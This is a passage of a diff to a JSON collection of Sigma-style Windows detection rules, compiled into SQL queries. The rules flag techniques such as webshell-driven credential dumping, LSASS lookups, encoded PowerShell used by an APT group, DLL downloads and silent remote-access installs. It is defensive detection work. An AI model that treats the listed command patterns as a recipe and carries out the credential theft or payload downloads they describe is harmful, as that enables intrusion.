"proc_creation_win_pdqdeploy_runner_susp_children.yml" + "filename": "proc_creation_win_pua_iox.yml" }, { - "title": "Suspicious Network Command", - "id": "a29c1813-ab1f-4dde-b489-330b952e91ae", + "title": "MERCURY APT Activity", + "id": "a62298a3-1fe0-422f-9a68-ffbcbc5a123d", "status": "experimental", - "description": "Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems", - "author": "frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", + "description": "Detects suspicious command line patterns seen being used by MERCURY APT", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1016" + "attack.execution", + "attack.t1059.001", + "attack.g0069" ], "falsepositives": [ - "Administrator, hotline ask to user" + "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%ipconfig /all%' ESCAPE '\\' OR CommandLine LIKE '%netsh interface show interface%' ESCAPE '\\' OR CommandLine LIKE '%arp -a%' ESCAPE '\\' OR CommandLine LIKE '%nbtstat -n%' ESCAPE '\\' OR CommandLine LIKE '%net config%' ESCAPE '\\' OR CommandLine LIKE '%route print%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-exec bypass -w 1 -enc%' ESCAPE '\\' AND CommandLine LIKE '%UwB0AGEAcgB0AC0ASgBvAGIAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAHsAKABzAGEAcABzACAAKAAiAHAA%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_network_command.yml" + "filename": "proc_creation_win_apt_mercury.yml" }, { - "title": "Use of Adplus.exe", - "id": "2f869d59-7f6a-4931-992c-cce556ff2d53", - "status": "experimental", - "description": "The \"AdPlus.exe\" binary that is part of the Windows SDK can be used as a lolbin to dump process memory and execute arbitrary commands", - "author": "Nasreddine Bencherchali (Nextron 
Systems)", + "title": "Custom Class Execution via Xwizard", + "id": "53d4bb30-3f36-4e8a-b078-69d36c4a79ff", + "status": "test", + "description": "Detects the execution of Xwizard tool with specific arguments which utilized to run custom class properties.", + "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.t1003.001" + "attack.t1218" ], "falsepositives": [ - "Legitimate usage of Adplus" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\adplus.exe' ESCAPE '\\' OR OriginalFileName = 'Adplus.exe') AND (CommandLine LIKE '% -hang %' ESCAPE '\\' OR CommandLine LIKE '% -pn %' ESCAPE '\\' OR CommandLine LIKE '% -pmn %' ESCAPE '\\' OR CommandLine LIKE '% -p %' ESCAPE '\\' OR CommandLine LIKE '% -po %' ESCAPE '\\' OR CommandLine LIKE '% -c %' ESCAPE '\\' OR CommandLine LIKE '% -sc %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\xwizard.exe' ESCAPE '\\' AND CommandLine REGEXP '\\{[a-fA-F0-9]{8}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{12}\\}')" ], - "filename": "proc_creation_win_lolbin_adplus.yml" + "filename": "proc_creation_win_lolbin_class_exec_xwizard.yml" }, { - "title": "Execution in Webserver Root Folder", - "id": "35efb964-e6a5-47ad-bbcd-19661854018d", - "status": "test", - "description": "Detects a suspicious program execution in a web service root folder (filter out false positives)", + "title": "Webshell Hacking Activity Patterns", + "id": "4ebc877f-4612-45cb-b3a5-8e3834db36c9", + "status": "experimental", + "description": "Detects certain parent child patterns found in cases in which a webshell is used to perform certain credential dumping or exfiltration activities on a compromised system", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.persistence", - "attack.t1505.003" + "attack.t1505.003", + 
"attack.t1018", + "attack.t1033", + "attack.t1087" ], "falsepositives": [ - "Various applications", - "Tools that include ping or nslookup command invocations" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wwwroot\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmpub\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\htdocs\\\\%' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%bin\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Tools\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\SMSComponent\\\\%' ESCAPE '\\') AND ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentProcessName LIKE '%-tomcat-%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND ((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%comsvcs%' ESCAPE '\\') OR (CommandLine LIKE '% -hp%' ESCAPE '\\' AND CommandLine LIKE '% a %' ESCAPE '\\' AND CommandLine LIKE '% -m%' ESCAPE '\\') OR (CommandLine LIKE '%net%' ESCAPE '\\' AND CommandLine LIKE '% user %' ESCAPE '\\' AND CommandLine LIKE '% /add%' ESCAPE '\\') OR (CommandLine LIKE '%net%' ESCAPE '\\' AND CommandLine LIKE '% localgroup %' ESCAPE '\\' AND 
CommandLine LIKE '% administrators %' ESCAPE '\\' AND CommandLine LIKE '%/add%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\ntdsutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ldifde.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\adfind.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Nanodump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\fsutil.exe' ESCAPE '\\') OR (CommandLine LIKE '% -NoP %' ESCAPE '\\' OR CommandLine LIKE '% -W Hidden %' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '% /decode %' ESCAPE '\\' OR CommandLine LIKE '%reg save %' ESCAPE '\\' OR CommandLine LIKE '%.downloadstring(%' ESCAPE '\\' OR CommandLine LIKE '%.downloadfile(%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '% /ticket:%' ESCAPE '\\' OR CommandLine LIKE '% sekurlsa%' ESCAPE '\\' OR CommandLine LIKE '%.dmp full%' ESCAPE '\\' OR CommandLine LIKE '%process call create%' ESCAPE '\\' OR CommandLine LIKE '%whoami /priv%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_execution_path_webserver.yml" + "filename": "proc_creation_win_webshell_hacking.yml" }, { - "title": "Potential PowerShell Obfuscation Via Reversed Commands", - "id": "b6b49cd1-34d6-4ead-b1bf-176e9edba9a4", + "title": "Remote Access Tool - AnyDesk Silent Installation", + "id": "114e7f1c-f137-48c8-8f54-3088c24ce4b9", "status": "test", - "description": "Detects the presence of reversed PowerShell commands in the CommandLine. This is often used as a method of obfuscation by attackers", - "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", + "description": "Detects AnyDesk Remote Desktop silent installation. 
Which can be used by attackers to gain remote access.", + "author": "Ján Trenčanský", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unlikely" + "Legitimate deployment of AnyDesk" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%hctac%' ESCAPE '\\' OR CommandLine LIKE '%kaerb%' ESCAPE '\\' OR CommandLine LIKE '%dnammoc%' ESCAPE '\\' OR CommandLine LIKE '%ekovn%' ESCAPE '\\' OR CommandLine LIKE '%eliFd%' ESCAPE '\\' OR CommandLine LIKE '%rahc%' ESCAPE '\\' OR CommandLine LIKE '%etirw%' ESCAPE '\\' OR CommandLine LIKE '%golon%' ESCAPE '\\' OR CommandLine LIKE '%tninon%' ESCAPE '\\' OR CommandLine LIKE '%eddih%' ESCAPE '\\' OR CommandLine LIKE '%tpircS%' ESCAPE '\\' OR CommandLine LIKE '%ssecorp%' ESCAPE '\\' OR CommandLine LIKE '%llehsrewop%' ESCAPE '\\' OR CommandLine LIKE '%esnopser%' ESCAPE '\\' OR CommandLine LIKE '%daolnwod%' ESCAPE '\\' OR CommandLine LIKE '%tneilCbeW%' ESCAPE '\\' OR CommandLine LIKE '%tneilc%' ESCAPE '\\' OR CommandLine LIKE '%ptth%' ESCAPE '\\' OR CommandLine LIKE '%elifotevas%' ESCAPE '\\' OR CommandLine LIKE '%46esab%' ESCAPE '\\' OR CommandLine LIKE '%htaPpmeTteG%' ESCAPE '\\' OR CommandLine LIKE '%tcejbO%' ESCAPE '\\' OR CommandLine LIKE '%maerts%' ESCAPE '\\' OR CommandLine LIKE '%hcaerof%' ESCAPE '\\' OR CommandLine LIKE '%retupmoc%' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%-EncodedCommand%' ESCAPE '\\' AND CommandLine LIKE '%rahc%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%--install%' ESCAPE '\\' AND CommandLine LIKE 
'%--start-with-win%' ESCAPE '\\' AND CommandLine LIKE '%--silent%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_cmdline_reversed_strings.yml" + "filename": "proc_creation_win_remote_access_tools_anydesk_silent_install.yml" }, { - "title": "Process Creation Using Sysnative Folder", - "id": "3c1b5fb0-c72f-45ba-abd1-4d4c353144ab", + "title": "Potential DLL File Download Via PowerShell Invoke-WebRequest", + "id": "0f0450f3-8b47-441e-a31b-15a91dc243e2", "status": "experimental", - "description": "Detects process creation events that use the Sysnative folder (common for CobaltStrike spawns)", - "author": "Max Altgelt (Nextron Systems)", - "tags": [ - "attack.t1055" - ], + "description": "Detects potential DLL files being downloaded using the PowerShell Invoke-WebRequest cmdlet", + "author": "Florian Roth (Nextron Systems), Hieu Tran", "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE 'C:\\\\Windows\\\\Sysnative\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%Invoke-WebRequest %' ESCAPE '\\' OR CommandLine LIKE '%IWR %' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%OutFile%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_sysnative.yml" + "filename": "proc_creation_win_powershell_download_dll.yml" }, { - "title": "UNC2452 PowerShell Pattern", - "id": "b7155193-8a81-4d8f-805d-88de864ca50c", + "title": "Suspicious HWP Sub Processes", + "id": "023394c4-29d5-46ab-92b8-6a534c6f447b", "status": "test", - "description": "Detects a specific PowerShell command line pattern used by the UNC2452 actors as mentioned in Microsoft and Symantec reports", + "description": "Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate an exploitation", "author": "Florian Roth (Nextron Systems)", "tags": 
[ + "attack.initial_access", + "attack.t1566.001", "attack.execution", - "attack.t1059.001", - "attack.t1047" + "attack.t1203", + "attack.t1059.003", + "attack.g0032" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%Invoke-WMIMethod win32\\_process -name create -argumentlist%' ESCAPE '\\' AND CommandLine LIKE '%rundll32 c:\\\\windows%' ESCAPE '\\') OR (CommandLine LIKE '%wmic /node:%' ESCAPE '\\' AND CommandLine LIKE '%process call create \"rundll32 c:\\\\windows%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\Hwp.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\gbb.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_unc2452_ps.yml" + "filename": "proc_creation_win_hwp_exploits.yml" }, { - "title": "Schtasks From Suspicious Folders", - "id": "8a8379b8-780b-4dbf-b1e9-31c8d112fefb", - "status": "experimental", - "description": "Detects scheduled task creations that have suspicious action command and folder combinations", - "author": "Florian Roth (Nextron Systems)", + "title": "Uninstall Sysinternals Sysmon", + "id": "6a5f68d1-c4b5-46b9-94ee-5324892ea939", + "status": "test", + "description": "Detects the removal of Sysmon, which could be a potential attempt at defense evasion", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1053.005" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate administrators might use this command to remove Sysmon for debugging purposes" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND CommandLine LIKE '% /create %' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE 
'%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\') AND (CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Sysmon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Sysmon.exe' ESCAPE '\\') OR Description = 'System activity monitor') AND (CommandLine LIKE '%-u%' ESCAPE '\\' OR CommandLine LIKE '%/u%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_folder_combos.yml" + "filename": "proc_creation_win_sysinternals_sysmon_uninstall.yml" }, { - "title": "Windows Binary Executed From WSL", - "id": "ed825c86-c009-4014-b413-b76003e33d35", - "status": "experimental", - "description": "Detects the execution of Windows binaries from within a WSL instance. 
This could be used to masquerade parent-child relationships", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Extrac32 Alternate Data Stream Execution", + "id": "4b13db67-0c45-40f1-aba8-66a1a7198a1e", + "status": "test", + "description": "Extract data from cab file and hide it in an alternate data stream", + "author": "frack113", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1202" + "attack.t1564.004" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName REGEXP '[a-zA-Z]:\\\\' AND CurrentDirectory LIKE '%\\\\\\\\wsl.localhost%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%extrac32.exe%' ESCAPE '\\' AND CommandLine LIKE '%.cab%' ESCAPE '\\' AND CommandLine REGEXP ':[^\\\\]')" ], - "filename": "proc_creation_win_wsl_windows_binaries_execution.yml" + "filename": "proc_creation_win_lolbin_extrac32_ads.yml" }, { - "title": "Potential EmpireMonkey Activity", - "id": "10152a7b-b566-438f-a33c-390b607d1c8d", + "title": "Remote Access Tool - AnyDesk Piped Password Via CLI", + "id": "b1377339-fda6-477a-b455-ac0923f9ec2c", "status": "experimental", - "description": "Detects potential EmpireMonkey APT activity", - "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects piping the password to an anydesk instance via CMD and the '--set-password' flag.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.010" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unlikely" + "Legitimate piping of the password to anydesk", + "Some FP could occur with similar tools that uses the same command line '--set-password'" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine 
LIKE '%/e:jscript%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Local\\\\Temp\\\\Errors.bat%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%/c %' ESCAPE '\\' AND CommandLine LIKE '%echo %' ESCAPE '\\' AND CommandLine LIKE '%.exe --set-password%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_empiremonkey.yml" + "filename": "proc_creation_win_remote_access_tools_anydesk_piped_password_via_cli.yml" }, { - "title": "Potential MuddyWater APT Activity", - "id": "36222790-0d43-4fe8-86e4-674b27809543", + "title": "Invoke-Obfuscation Via Use MSHTA", + "id": "ac20ae82-8758-4f38-958e-b44a3140ca88", "status": "test", - "description": "Detects potential Muddywater APT activity", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ "attack.defense_evasion", + "attack.t1027", "attack.execution", - "attack.g0069" + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%vbscript:Close(Execute(\"CreateObject(%' ESCAPE '\\' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%-w 1 -exec Bypass%' ESCAPE '\\' AND CommandLine LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%Win32\\_OperatingSystem%' ESCAPE '\\' AND CommandLine LIKE '%Win32\\_NetworkAdapterConfiguration%' ESCAPE '\\' AND CommandLine LIKE '%root\\\\SecurityCenter2%' ESCAPE '\\' AND CommandLine LIKE '%[System.Net.DNS]%' ESCAPE '\\') OR (CommandLine LIKE '%[Convert]::ToBase64String%' ESCAPE '\\' AND CommandLine LIKE '%[System.Text.Encoding]::UTF8.GetString]%' ESCAPE '\\' AND CommandLine LIKE '%GetResponse().GetResponseStream()%' ESCAPE '\\' AND CommandLine LIKE '%[System.Net.HttpWebRequest]::Create(%' ESCAPE '\\' AND CommandLine LIKE '%-bxor %' ESCAPE 
'\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND CommandLine LIKE '%mshta%' ESCAPE '\\' AND CommandLine LIKE '%vbscript:createobject%' ESCAPE '\\' AND CommandLine LIKE '%.run%' ESCAPE '\\' AND CommandLine LIKE '%(window.close)%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_muddywater_activity.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml" }, { - "title": "Potential Reconnaissance Activity Via GatherNetworkInfo.VBS", - "id": "575dce0c-8139-4e30-9295-1ee75969f7fe", - "status": "test", - "description": "Detects execution of the built-in script located in \"C:\\Windows\\System32\\gatherNetworkInfo.vbs\". Which can be used to gather information about the target machine", - "author": "blueteamer8699", + "title": "Add SafeBoot Keys Via Reg Utility", + "id": "d7662ff6-9e97-4596-a61d-9839e32dee8d", + "status": "experimental", + "description": "Detects execution of \"reg.exe\" commands with the \"add\" or \"copy\" flags on safe boot registry keys. 
Often used by attacker to allow the ransomware to work in safe mode as some security products do not", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.execution", - "attack.t1615", - "attack.t1059.005" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Administrative activity" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') OR OriginalFileName IN ('cscript.exe', 'wscript.exe')) AND CommandLine LIKE '%gatherNetworkInfo.vbs%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot%' ESCAPE '\\' AND (CommandLine LIKE '% copy %' ESCAPE '\\' OR CommandLine LIKE '% add %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_gather_network_info.yml" + "filename": "proc_creation_win_reg_add_safeboot.yml" }, { - "title": "HackTool - Sliver C2 Implant Activity Pattern", - "id": "42333b2c-b425-441c-b70e-99404a17170f", + "title": "PUA - Seatbelt Execution", + "id": "38646daa-e78f-4ace-9de0-55547b2d30da", "status": "experimental", - "description": "Detects process activity patterns as seen being used by Sliver C2 framework implants", - "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", + "description": "Detects the execution of the PUA/Recon tool Seatbelt via PE information of command line parameters", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.discovery", + "attack.t1526", + "attack.t1087", + "attack.t1083" ], "falsepositives": [ "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * 
FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-NoExit -Command [Console]::OutputEncoding=[Text.UTF8Encoding]::UTF8%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Seatbelt.exe' ESCAPE '\\' OR OriginalFileName = 'Seatbelt.exe' OR Description = 'Seatbelt' OR (CommandLine LIKE '% DpapiMasterKeys%' ESCAPE '\\' OR CommandLine LIKE '% InterestingProcesses%' ESCAPE '\\' OR CommandLine LIKE '% InterestingFiles%' ESCAPE '\\' OR CommandLine LIKE '% CertificateThumbprints%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumBookmarks%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumHistory%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumPresence%' ESCAPE '\\' OR CommandLine LIKE '% CloudCredentials%' ESCAPE '\\' OR CommandLine LIKE '% CredEnum%' ESCAPE '\\' OR CommandLine LIKE '% CredGuard%' ESCAPE '\\' OR CommandLine LIKE '% FirefoxHistory%' ESCAPE '\\' OR CommandLine LIKE '% ProcessCreationEvents%' ESCAPE '\\')) OR ((CommandLine LIKE '% -group=misc%' ESCAPE '\\' OR CommandLine LIKE '% -group=remote%' ESCAPE '\\' OR CommandLine LIKE '% -group=chromium%' ESCAPE '\\' OR CommandLine LIKE '% -group=slack%' ESCAPE '\\' OR CommandLine LIKE '% -group=system%' ESCAPE '\\' OR CommandLine LIKE '% -group=user%' ESCAPE '\\' OR CommandLine LIKE '% -group=all%' ESCAPE '\\') AND CommandLine LIKE '% -outputfile=%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_sliver_c2_execution_pattern.yml" + "filename": "proc_creation_win_pua_seatbelt.yml" }, { - "title": "Arbitrary File Download Via MSPUB.EXE", - "id": "3b3c7f55-f771-4dd6-8a6e-08d057a17caf", + "title": "Findstr LSASS", + "id": "fe63010f-8823-4864-a96b-a7b4a0f7b929", "status": "experimental", - "description": "Detects usage of \"MSPUB\" (Microsoft Publisher) to download arbitrary files", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects findstring commands that include the keyword lsass, which indicates 
recon actviity for the LSASS process PID", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1218" + "attack.credential_access", + "attack.t1552.006" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR OriginalFileName = 'MSPUB.exe') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND CommandLine LIKE '%lsass%' ESCAPE '\\') OR (CommandLine LIKE '% /i lsass.exe%' ESCAPE '\\' OR CommandLine LIKE '% /i \"lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr.exe lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr \"lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr.exe \"lsass%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_mspub_download.yml" + "filename": "proc_creation_win_findstr_lsass.yml" }, { - "title": "Suspicious Powercfg Execution To Change Lock Screen Timeout", - "id": "f8d6a15e-4bc8-4c27-8e5d-2b10f0b73e5b", - "status": "experimental", - "description": "Detects suspicious execution of 'Powercfg.exe' to change lock screen timeout", - "author": "frack113", + "title": "Renamed AutoHotkey.EXE Execution", + "id": "0f16d9cf-0616-45c8-8fad-becc11b5a41c", + "status": "test", + "description": "Detects execution of a renamed autohotkey.exe binary based on PE metadata fields", + "author": "Nasreddine Bencherchali", "tags": [ "attack.defense_evasion" ], 
@@ -16606,1216 +16225,1161 @@ ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\powercfg.exe' ESCAPE '\\' OR OriginalFileName = 'PowerCfg.exe') AND ((CommandLine LIKE '%/setacvalueindex %' ESCAPE '\\' AND CommandLine LIKE '%SCHEME\\_CURRENT%' ESCAPE '\\' AND CommandLine LIKE '%SUB\\_VIDEO%' ESCAPE '\\' AND CommandLine LIKE '%VIDEOCONLOCK%' ESCAPE '\\') OR (CommandLine LIKE '%-change %' ESCAPE '\\' AND CommandLine LIKE '%-standby-timeout-%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product LIKE '%AutoHotkey%' ESCAPE '\\' OR Description LIKE '%AutoHotkey%' ESCAPE '\\' OR OriginalFileName IN ('AutoHotkey.exe', 'AutoHotkey.rc')) AND NOT ((NewProcessName LIKE '%\\\\AutoHotkey.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AutoHotkey32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AutoHotkey32\\_UIA.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AutoHotkey64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AutoHotkey64\\_UIA.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AutoHotkeyA32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AutoHotkeyA32\\_UIA.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AutoHotkeyU32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AutoHotkeyU32\\_UIA.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AutoHotkeyU64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AutoHotkeyU64\\_UIA.exe' ESCAPE '\\') OR NewProcessName LIKE '%\\\\AutoHotkey%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powercfg_execution.yml" + "filename": "proc_creation_win_renamed_autohotkey.yml" }, { - "title": "Whoami.EXE Execution Anomaly", - "id": "8de1cbe8-d6f5-496d-8237-5f44a721c7a0", - "status": "experimental", - "description": "Detects the execution of whoami.exe with suspicious parent processes.", - "author": "Florian Roth (Nextron Systems)", + "title": "HackTool - CrackMapExec Execution Patterns", + "id": 
